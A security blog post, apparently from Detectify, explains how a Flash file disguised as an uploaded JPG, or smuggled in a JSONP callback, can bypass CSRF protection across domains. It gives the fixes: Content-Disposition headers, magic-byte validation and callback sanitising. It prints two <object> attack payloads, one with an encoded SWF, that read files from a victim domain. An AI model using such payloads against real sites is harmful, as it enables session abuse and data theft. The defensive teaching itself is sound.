The lesser known pitfalls of allowing file uploads on your website
These days a lot of websites allow users to upload files, but many developers don't know about the lesser known pitfalls of letting users (potential attackers) upload files, even files that pass validation.
What’s a valid file? Usually, a restriction would be on two parameters:
The uploaded file extension
The uploaded Content-Type
For example, the web application could check that the extension is “jpg” and the Content-Type “image/jpeg” to make sure it’s impossible to upload malicious files. Right?
The problem is that plugins like Flash don't care about the extension or the Content-Type. If a file is embedded using an <object> tag, it will be executed as a Flash file as long as the content of the file looks like a valid Flash file.
But wait a minute! Shouldn't the Flash file be executed within the domain that embeds it using the <object> tag? Yes and no. If a Flash file (disguised as an image file) is uploaded to victim.com and then embedded on attacker.com, the Flash file can execute JavaScript within the domain of attacker.com. However, when the Flash file sends requests, Flash Player treats it as originating from victim.com (the domain it was loaded from), so it is allowed to read responses from victim.com.
This basically means that if a website allows file uploads without validating the content of the file, an attacker can bypass any CSRF protection on the website.
The attack
Based on these facts we can create an attack scenario like this:
An attacker creates a malicious Flash (SWF) file
The attacker changes the file extension to JPG
The attacker uploads the file to victim.com
The attacker embeds the file on attacker.com using an <object> tag with type “application/x-shockwave-flash”
The victim visits attacker.com, where the file is loaded by the <object> tag
The attacker can now send and receive arbitrary requests to victim.com using the victim's session
The attacker sends a request to victim.com and extracts the CSRF token from the response
A payload could look like this:
<object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object>
The fix
The good news is that there's a fairly easy way to prevent Flash from doing this. Flash won't execute the file if the server sends it with a Content-Disposition header like so:
Content-Disposition: attachment; filename="image.jpg"
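The two defences that follow from this, as an added example that is not code from the Detectify post: validate the actual bytes of an upload (a renamed SWF fails a magic-byte check even with a .jpg extension and an image/jpeg Content-Type), and serve stored uploads with Content-Disposition: attachment. The function names, the accepted formats and the sample byte strings are assumptions made for illustration.

```python
# Added example, not from the original post: server-side checks for an
# image-upload endpoint. Function names and sample inputs are assumptions.
import re

# Leading bytes (magic numbers) of the image formats this endpoint accepts.
IMAGE_SIGNATURES = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
# Extensions that are allowed for each sniffed type.
EXTENSIONS = {"image/jpeg": {"jpg", "jpeg"}, "image/png": {"png"}, "image/gif": {"gif"}}
# Uncompressed, zlib-compressed and LZMA-compressed SWF headers.
SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")


def sniff_type(data: bytes):
    """Return the MIME type implied by the file's leading bytes, or None."""
    for mime, sigs in IMAGE_SIGNATURES.items():
        if any(data.startswith(s) for s in sigs):
            return mime
    return None


def validate_upload(filename: str, declared_type: str, data: bytes):
    """Require extension, declared Content-Type and real content to agree.
    Returns (accepted, reason-or-detected-type)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if data[:3] in SWF_SIGNATURES:
        return False, "content is a Flash (SWF) file"
    real = sniff_type(data)
    if real is None:
        return False, "content does not match any accepted image format"
    if declared_type.lower() != real:
        return False, f"declared {declared_type} but content is {real}"
    if ext not in EXTENSIONS[real]:
        return False, f"extension .{ext} does not match {real} content"
    return True, real


def download_headers(stored_name: str, mime: str):
    """Headers for serving a stored upload: Content-Disposition: attachment
    stops Flash Player from executing the body, and nosniff stops browsers
    from second-guessing the declared Content-Type."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", stored_name)
    return {
        "Content-Type": mime,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }


# Constructed sample inputs: a JPEG/JFIF header and a zlib-compressed SWF header.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
SWF_SAMPLE = b"CWS\x07\x0e\x00\x00\x00" + b"x\x9c" + b"\x00" * 16

if __name__ == "__main__":
    print(validate_upload("avatar.jpg", "image/jpeg", JPEG_SAMPLE))
    print(validate_upload("avatar.jpg", "image/jpeg", SWF_SAMPLE))
    print(download_headers("avatar.jpg", "image/jpeg"))
```

The magic-byte check is the primary control: it rejects the renamed SWF regardless of what the extension and Content-Type say. The attachment header is the belt-and-braces fallback the post describes; browsers still render such a response inside an <img> tag, so profile pictures keep working, while a direct navigation to the URL turns into a download.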
Other uses
But the fun doesn't stop at file uploads! Since the only requirement of this attack is that an attacker can control the data at a location on the target domain (regardless of Content-Type), there are more ways to perform it.
One way would be to abuse a JSONP API. Usually, the attacker can control the output of a JSONP API endpoint by changing the callback parameter in the URL. There's no Cross-Site Scripting issue because the server will send Content-Type "application/json". However, if an attacker uses an entire Flash file as the callback and embeds that URL on their domain using the <object> tag, we have the same outcome. A payload could look like this:
<object style="height:1px;width:1px;" data="http://mywebsite.example.com/user/get?type=jsonp&callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://mywebsite.example.com/secret_file.txt"></object>
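The JSONP variant is stopped on the server side by refusing to echo anything but a plain JavaScript identifier as the callback, and by making sure the response body can never begin with a SWF signature. The following is an added example, not code from the post or from any real API; the function names, the length limit and the sample callbacks are assumptions made for illustration.

```python
# Added example, not from the original post: a JSONP endpoint that cannot
# be turned into a Flash file through its callback parameter. Names and
# limits are assumptions.
import json
import re

# A dotted JavaScript identifier path such as "cb" or "jQuery.callbacks_1".
# A SWF header ("CWS" followed by a version byte and a length) can never
# match, because the bytes after the signature are not identifier characters.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MAX_CALLBACK_LEN = 64
SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")


def sanitize_callback(callback):
    """Return the callback if it is a short, well-formed identifier, else None."""
    if callback is None or len(callback) > MAX_CALLBACK_LEN:
        return None
    if not CALLBACK_RE.match(callback):
        return None
    return callback


def jsonp_response(callback, payload):
    """Build (status, headers, body) for a JSONP request.
    The body is prefixed with "/**/" (a harmless JavaScript comment) so that,
    whatever the callback, the first bytes are never a Flash signature."""
    name = sanitize_callback(callback)
    if name is None:
        body = json.dumps({"error": "invalid callback"})
        return 400, {"Content-Type": "application/json"}, body.encode("utf-8")
    body = "/**/" + name + "(" + json.dumps(payload) + ");"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, body.encode("utf-8")


def starts_like_swf(body: bytes):
    """True if Flash Player could take this body for a SWF file."""
    return body[:3] in SWF_SIGNATURES


# Constructed sample callbacks: a normal one, and one shaped like the start of
# the URL-decoded SWF header used in the payload above.
GOOD_CALLBACK = "jQuery.callbacks_1"
SWF_CALLBACK = "CWS\x07\x0e000x\x9c"

if __name__ == "__main__":
    print(jsonp_response(GOOD_CALLBACK, {"user": 2292}))
    print(jsonp_response(SWF_CALLBACK, {"user": 2292}))
```

The identifier check alone defeats the payload shown above, since the SWF header contains control and high bytes that no identifier may hold. The "/**/" prefix is defence in depth: even a callback that slipped through some other validation path could not put a SWF signature at offset zero of the response.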
And like always, if you want to know if your website has issues like these, try a Detectify scan!
That’s it for now
Source: https://labs.detectify.com/2014/05/20/the-lesser-known-pitfalls-of-allowing-file-uploads-on-your-website/